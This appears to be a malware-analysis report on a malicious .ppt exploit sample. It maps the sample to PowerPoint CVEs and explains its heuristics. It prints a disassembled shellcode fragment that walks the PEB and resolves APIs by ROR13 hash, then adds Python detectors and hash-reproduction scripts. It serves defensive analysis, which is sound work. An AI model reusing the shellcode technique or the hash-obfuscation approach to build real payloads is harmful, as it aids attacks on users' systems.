Verdict: MALICIOUS
Risk Score: 320

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1055 Process Injection
The sample triggers critical heuristics for exploitation of binary-format (.ppt) PowerPoint vulnerabilities: an exact structural match for CVE-2006-0022 (MS06-028, a malformed TextHeaderAtom) and a likely match for the CVE-2011-1269 / MS11-036 family, the latter based on a native-code payload (an embedded PE and/or shellcode) staged in an oversized binary stream. The shellcode resolves Windows APIs by walking the PEB and hashing export names (ROR13 style), and a long run of 0x41 bytes matches both the NOP-equivalent sled and the heap-spray heuristics. Two API names (LoadLibraryA, GetProcAddress) are XO-encoded with the single-byte key 0x81 to hide them from plain string scans. The T1055 mapping comes from the payload heuristic (embedded PE and/or process-injection shellcode); the disassembled fragment itself shows API resolution and a handle scan, not an injection call.
Heuristics (7)
- CVE-2006-0022 — PowerPoint malformed TextHeaderAtom (critical; CVE match: exact; id CVE_2006_0022)
  The PowerPoint Document stream contains a malformed TextHeaderAtom whose textType is outside the valid range (MS-PPT TextTypeEnum allows only 0, 1, 2 and 4 through 8). This is the OffVis-compatible structural trigger for the MS06-028 PowerPoint malformed-record vulnerability. Because it is a record-level match on the document structure rather than a payload signature, it is the strongest CVE attribution on this page.
- PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family (critical; CVE match: likely; id PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD)
  A macro-free binary PowerPoint (.ppt) document carries a native-code payload (an embedded PE and/or process-injection shellcode) staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556). This heuristic matches the payload, not a record-level trigger, which is why its CVE attribution is "likely" while the TextHeaderAtom finding is "exact": the payload alone does not tell the listed CVEs apart.
- XOR-encoded strings (key 0x81) (critical; id SC_XOR_ENCODED)
  Found 2 Windows library/API names XOR-encoded with the single-byte key 0x81: 'LoadLibraryA', 'GetProcAddress'. These are the pair a decoded stage or a manual PE loader needs to resolve further imports by name once it holds a kernel32 base, so string-based resolution is typically used after the hash-based bootstrap. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (the single mnemonic 'inc' is 95% of instructions, a sled or padding/filler run, not program logic).
- PEB access via FS segment (x86) (high; id SC_PEB_ACCESS)
  The fragment at 0x6D0 reads the PEB through fs:[0x30], follows PEB.Ldr (+0x0C) to InInitializationOrderModuleList (+0x1C), steps to the second list entry with lodsd and takes its DllBase (+0x08 from the link). On Windows XP/2003 the second module in initialization order is kernel32.dll, so this is the classic kernel32 base lookup of XP-era shellcode; on Windows 7 and later that slot holds KERNELBASE.dll, which dates the payload. The jmp 0x8ec / pop eax pair has the shape of a jmp-call-pop get-PC sequence whose call lies outside the dumped window; eax then points at inline data that is copied into a context block on the stack.
  Disassembly
  x86 disassembly · validity: code (1.0) — 2/2 branch targets land on an instruction boundary (100% coherence)
    000006D0  64a130000000  mov eax, dword ptr fs:[0x30]     ; PEB
    000006D6  8b400c        mov eax, dword ptr [eax + 0xc]   ; PEB.Ldr
    000006D9  8b701c        mov esi, dword ptr [eax + 0x1c]  ; InInitializationOrderModuleList.Flink
    000006DC  ad            lodsd eax, dword ptr [esi]       ; eax = link of the second entry
    000006DD  8b7008        mov esi, dword ptr [eax + 8]     ; its DllBase (kernel32.dll on XP/2003)
    000006E0  e907020000    jmp 0x8ec                        ; target outside the dumped window
    000006E5  58            pop eax                          ; return address -> pointer to inline data
    000006E6  81ec00020000  sub esp, 0x200                   ; scratch area
    000006EC  8bfc          mov edi, esp                     ; edi = context block
    000006EE  8b18          mov ebx, dword ptr [eax]
    000006F0  895f04        mov dword ptr [edi + 4], ebx     ; ctx+0x04 = first dword of inline data
    000006F3  897708        mov dword ptr [edi + 8], esi     ; ctx+0x08 = kernel32 base
    000006F6  83c004        add eax, 4
    000006F9  89470c        mov dword ptr [edi + 0xc], eax   ; ctx+0x0c = pointer past that dword
    000006FC  57            push edi                         ; save context pointer across the call
    000006FD  56            push esi                         ; module base
    000006FE  68ad9b7ddf    push 0xdf7d9bad                  ; API hash
    00000703  e890010000    call 0x898                       ; hash resolver
    00000708  8bf0          mov esi, eax                     ; resolved function
    0000070A  33ff          xor edi, edi                     ; candidate = 0
    0000070C  6a00          push 0
    0000070E  57            push edi
    0000070F  ffd6          call esi                         ; f(candidate, 0)
    00000711  3d00d20100    cmp eax, 0x1d200                 ; == 119296 ?
    00000716  7403          je 0x71b
    00000718  47            inc edi                          ; next candidate
    00000719  ebf1          jmp 0x70c
    0000071B  8bc7          mov eax, edi
    0000071D  5f            pop edi                          ; restore context pointer
    0000071E  894710        mov dword ptr [edi + 0x10], eax  ; ctx+0x10 = value that passed the check
    00000721  ff7708        push dword ptr [edi + 8]         ; kernel32 base
    00000724  68ec97030c    push 0xc0397ec                   ; second API hash
    00000729  e86a010000    call 0x898                       ; hash resolver
    0000072E  89            .byte 0x89                       ; window ends mid-instruction (89 47 .. = mov [edi + disp8], eax)
    0000072F  47            inc edi
- PEB API-hash resolver (high; id SC_API_HASH_RESOLVER)
  PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver. The resolver at 0x898 is called twice in the fragment, each time with a module base and a 32-bit constant: 0xdf7d9bad and 0x0c0397ec. Hashing export names with the plain ROR13 form (rotate right by 13, add the next byte, over the ASCII name alone with no module hash and no terminator) gives exactly these values for GetFileSize and GlobalAlloc. That reading fits the loop at 0x70c to 0x719, which calls the first resolved function as f(edi, 0) for edi = 0, 1, 2, ... until it returns 0x1d200 (119296): GetFileSize(handle, NULL) tried against every small handle value is the usual way Office-exploit shellcode finds the already-open document by its own file size, so that it can read the payload staged inside it. The matching handle is stored at ctx+0x10 before GlobalAlloc is resolved, consistent with allocating a buffer for that read. Do not match these constants against Metasploit block_api hashes, which fold the module name in and give different values for the same exports.
  Disassembly: identical to the 0x6D0 fragment shown for the PEB-access heuristic above.
- Heap-spray pattern detected (high; id SC_HEAP_SPRAY)
  Repeated 0x41 ('A') bytes found. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (the single mnemonic 'inc' is 100% of instructions, a sled or padding/filler run, not program logic). Caveat: this is a static byte scan and it fires on the same 0x41 run as the sled heuristic; a heap spray proper is a runtime allocation pattern (many copies of sled plus shellcode placed at predictable heap addresses) that a file scan cannot observe. Treat it as a pattern hit on the sled bytes, not as independent evidence of a spray.
- NOP-equivalent sled detected (medium; id SC_NOP_EQUIV_SLED)
  Long run of 0x41 bytes. On x86, 0x41 decodes as the single-byte 'inc ecx', which has no side effect the shellcode depends on, so a run of them works as a NOP-equivalent sled that tolerates an imprecise jump into the buffer. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (the single mnemonic 'inc' is 100% of instructions, a sled or padding/filler run, not program logic).
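As an added example (not part of this report and not the analyzer's own code), the record walk behind the TextHeaderAtom finding above can be reproduced in a few lines. The record type 0x0F9F and the TextTypeEnum values come from MS-PPT; the sample stream is constructed here and is not the analysed file. On a real .ppt you would first extract the "PowerPoint Document" stream from the OLE2 container (for instance with olefile) and pass its bytes to find_bad_text_header_atoms.

```python
"""Walk a PowerPoint Document stream and flag TextHeaderAtom records whose
textType falls outside MS-PPT TextTypeEnum (the CVE-2006-0022 / MS06-028
structural trigger). Added example; the sample stream below is constructed."""
import struct

RT_DOCUMENTATOM = 0x03E9        # MS-PPT RecordType values
RT_SLIDELISTWITHTEXT = 0x0FF0   # a container record (recVer 0xF)
RT_TEXTHEADERATOM = 0x0F9F
# MS-PPT TextTypeEnum: 0 title, 1 body, 2 notes, 4 other, 5 centerBody,
# 6 centerTitle, 7 halfBody, 8 quarterBody. Value 3 is unassigned.
VALID_TEXT_TYPES = {0, 1, 2, 4, 5, 6, 7, 8}


def iter_records(data, start=0, end=None, depth=0):
    """Yield (offset, recVer, recInstance, recType, recLen, depth) for each
    RecordHeader, descending into containers (recVer == 0xF)."""
    end = len(data) if end is None else end
    pos = start
    while pos + 8 <= end:
        ver_inst, rec_type, rec_len = struct.unpack_from("<HHI", data, pos)
        rec_ver, rec_inst = ver_inst & 0xF, ver_inst >> 4
        body = pos + 8
        # A recLen that overruns the parent is itself a malformed-record
        # sign; clamp it so the walk stays inside the buffer.
        body_end = min(body + rec_len, end)
        yield pos, rec_ver, rec_inst, rec_type, rec_len, depth
        if rec_ver == 0xF:
            yield from iter_records(data, body, body_end, depth + 1)
        pos = body_end


def find_bad_text_header_atoms(data):
    """Return [(offset, textType or None, reason)] for every TextHeaderAtom
    that is truncated or carries a textType outside TextTypeEnum."""
    findings = []
    for off, _ver, _inst, rtype, rlen, _depth in iter_records(data):
        if rtype != RT_TEXTHEADERATOM:
            continue
        if rlen < 4 or off + 12 > len(data):
            findings.append((off, None, "truncated TextHeaderAtom"))
            continue
        text_type = struct.unpack_from("<I", data, off + 8)[0]
        if text_type not in VALID_TEXT_TYPES:
            findings.append((off, text_type, "textType outside TextTypeEnum"))
    return findings


def record(rec_type, body, rec_ver=0, rec_inst=0):
    """Build a little-endian RecordHeader (recVer/recInstance, recType, recLen) + body."""
    return struct.pack("<HHI", (rec_inst << 4) | rec_ver, rec_type, len(body)) + body


def build_sample(bad_text_type=0xFFFFFFFF):
    """Constructed stream: a DocumentAtom stand-in, then a container holding
    one valid TextHeaderAtom (textType 1 = body) and, unless bad_text_type is
    None, one malformed TextHeaderAtom."""
    atoms = record(RT_TEXTHEADERATOM, struct.pack("<I", 1))
    if bad_text_type is not None:
        atoms += record(RT_TEXTHEADERATOM, struct.pack("<I", bad_text_type))
    return (record(RT_DOCUMENTATOM, b"\x00" * 40)
            + record(RT_SLIDELISTWITHTEXT, atoms, rec_ver=0xF))


if __name__ == "__main__":
    # Real file: data = olefile.OleFileIO(path).openstream("PowerPoint Document").read()
    for off, ttype, reason in find_bad_text_header_atoms(build_sample()):
        print(f"0x{off:08X}: {reason} (textType={ttype:#x})" if ttype is not None
              else f"0x{off:08X}: {reason}")
```

The walker clamps a recLen that would overrun its parent rather than trusting it; an oversized recLen is the other classic malformed-record sign and is worth reporting separately in a fuller scanner.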
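Added example (not the analyzer's code) for the API-hash resolver finding: the hash consumed by the resolver at 0x898 is reproduced and the two pushed constants are checked against a list of kernel32 export names. The plain variant (rotate right by 13 and add, over the ASCII name alone) maps 0xdf7d9bad to GetFileSize and 0x0c0397ec to GlobalAlloc. The Metasploit block_api variant, which also folds in the upper-cased UTF-16 module name and the terminators, is included to show why a "ROR13" hit still needs the exact variant pinned down before constants can be named. The candidate list is an assumption made for the demonstration.

```python
"""ROR13 API-hash reproduction for the resolver seen in the dump: hash a list
of candidate export names and match them to the pushed constants.
Added example; the candidate names are an assumption, not taken from the file."""

MASK32 = 0xFFFFFFFF


def ror32(x, n):
    """Rotate a 32-bit value right by n bits."""
    return ((x >> n) | (x << (32 - n))) & MASK32


def ror13_hash(name):
    """Plain variant: h = ror13(h) + byte, over the ASCII export name only
    (no module hash, no terminating NUL)."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, 13) + b) & MASK32
    return h


def metasploit_hash(module, func):
    """block_api variant: upper-cased UTF-16LE module name including its
    terminator, plus the ASCII function name including its NUL, summed."""
    h_mod = 0
    for b in (module.upper() + "\x00").encode("utf-16-le"):
        h_mod = (ror32(h_mod, 13) + b) & MASK32
    h_fn = 0
    for b in (func + "\x00").encode("ascii"):
        h_fn = (ror32(h_fn, 13) + b) & MASK32
    return (h_mod + h_fn) & MASK32


# Exports worth trying for file-reading Office shellcode (assumption).
CANDIDATES = [
    "GetFileSize", "GlobalAlloc", "ReadFile", "SetFilePointer", "CreateFileA",
    "CloseHandle", "VirtualAlloc", "WriteFile", "GetTempPathA", "WinExec",
    "LoadLibraryA", "GetProcAddress", "ExitProcess",
]


def build_table(names=CANDIDATES):
    """Map plain-ROR13 hash -> export name for the candidate list."""
    return {ror13_hash(n): n for n in names}


def resolve(constant, table=None):
    """Export name for a pushed hash constant, or None if nothing matches."""
    return (table or build_table()).get(constant & MASK32)


# The two constants pushed before `call 0x898` in the disassembly above.
PUSHED_HASHES = (0xDF7D9BAD, 0x0C0397EC)


def resolve_pushed(constants=PUSHED_HASHES):
    table = build_table()
    return [(hex(c), resolve(c, table)) for c in constants]


if __name__ == "__main__":
    for constant, name in resolve_pushed():
        print(constant, "->", name)
    # Same export, block_api form: a different constant entirely.
    print(hex(metasploit_hash("kernel32.dll", "LoadLibraryA")))
```

If neither variant matches, widen the candidate list with the full export table of kernel32.dll from an XP-era install (the PEB walk above only ever hands the resolver that one module) before concluding the hash is something other than ROR13.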
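The XOR-encoded-string finding and the two 0x41-run findings above are all byte-pattern scans over the stream. As an added example (not the analyzer's code), here is a scanner that brute-forces single-byte XOR keys against a short list of API names and reports long single-byte runs together with what the run byte decodes to as x86, which is why one run satisfies both the sled and the heap-spray heuristics. The sample buffer is constructed; the API-name list is an assumption.

```python
"""Byte-pattern triage: single-byte-XOR-encoded API names and long runs of
one byte (NOP-equivalent sled / naive heap-spray signature).
Added example; the sample buffer below is constructed, not the analysed file."""

# Names to look for under every single-byte key (assumption).
API_NAMES = [b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"WinExec",
             b"CreateFileA", b"GetFileSize", b"GlobalAlloc"]

# Single-byte x86 instructions commonly used as NOP-equivalent sled bytes
# (0x40+r = inc r32, 0x48+r = dec r32).
SLED_BYTES = {0x90: "nop", 0x41: "inc ecx", 0x42: "inc edx", 0x43: "inc ebx",
              0x47: "inc edi", 0x48: "dec eax", 0x49: "dec ecx", 0x4A: "dec edx"}


def xor_bytes(buf, key):
    return bytes(b ^ key for b in buf)


def find_xor_encoded_api_names(data, names=API_NAMES, keys=range(1, 256)):
    """Return sorted [(offset, key, name)] for every name found XOR-encoded
    under a single-byte key. Key 0 (plaintext) is excluded by default."""
    hits = []
    for key in keys:
        for name in names:
            enc = xor_bytes(name, key)
            start = 0
            while True:
                idx = data.find(enc, start)
                if idx == -1:
                    break
                hits.append((idx, key, name.decode()))
                start = idx + 1
    return sorted(hits)


def find_byte_runs(data, min_len=256):
    """Return [(offset, length, byte, mnemonic)] for runs of one repeated byte
    at least min_len long; mnemonic is the single x86 instruction the byte
    decodes to, or None if it is not a usual sled byte."""
    runs = []
    i, n = 0, len(data)
    while i < n:
        j = i + 1
        while j < n and data[j] == data[i]:
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i, data[i], SLED_BYTES.get(data[i])))
        i = j
    return runs


def build_sample():
    """Constructed buffer: filler, the two names XOR'd with 0x81 as in the
    report, more filler, a 512-byte 0x41 run, trailing filler."""
    return (b"\x00" * 64
            + xor_bytes(b"LoadLibraryA", 0x81) + b"\x00"
            + xor_bytes(b"GetProcAddress", 0x81) + b"\x00" * 33
            + b"\x41" * 512
            + b"\x00" * 16)


def triage(data):
    return {"xor_strings": find_xor_encoded_api_names(data),
            "runs": find_byte_runs(data)}


if __name__ == "__main__":
    result = triage(build_sample())
    for off, key, name in result["xor_strings"]:
        print(f"0x{off:06X} key 0x{key:02X} {name}")
    for off, length, byte, mnem in result["runs"]:
        print(f"0x{off:06X} run of {length} x 0x{byte:02X} ({mnem})")
```

The XOR scan is 255 keys times the name list per buffer, which is fine for a single stream but should be narrowed (or replaced by a key guess from known plaintext) before running over a large corpus.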